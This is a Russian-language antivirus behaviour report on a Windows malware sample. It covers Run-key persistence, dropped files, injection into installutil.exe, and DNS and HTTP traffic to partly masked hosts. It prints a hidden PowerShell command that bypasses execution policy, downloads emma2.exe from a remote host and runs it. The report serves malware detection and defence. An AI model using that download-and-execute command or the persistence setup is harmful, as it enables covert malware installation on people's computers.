Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'msnet' = '%APPDATA%\msnet\msnet.exe'
Вредоносные функции
Загружает и запускает на исполнение
- http://sm###scope.info/look/emma2.exe как %appdata%\msnet.exe
Внедряет код в
следующие пользовательские процессы:
- installutil.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\msnet.exe
- %TEMP%\installutil.exe
- %TEMP%\b35bc50e-fc56-4239-a7d0-bb79118b31c9\agiledotnetrt.dll
- %APPDATA%\msnet\msnet.exe
Перемещает следующие файлы
- %TEMP%\installutil.exe в %TEMP%\tmpg801.tmp
Сетевая активность
Подключается к
- 're####panel.co.vu':80
TCP
Запросы HTTP GET
- http://sm###scope.info/look/emma2.exe
Запросы HTTP POST
- http://re####panel.co.vu/emm2/inc/77338ec6e0ae4b.php
UDP
- DNS ASK sm###scope.info
- DNS ASK re####panel.co.vu
Другое
Создает и запускает на исполнение
- '%APPDATA%\msnet.exe'
- '%TEMP%\installutil.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sm###scope.info/look/emma2.exe','%APPDATA%\msnet.exe');Start-Process '...' (со скрытым окном)
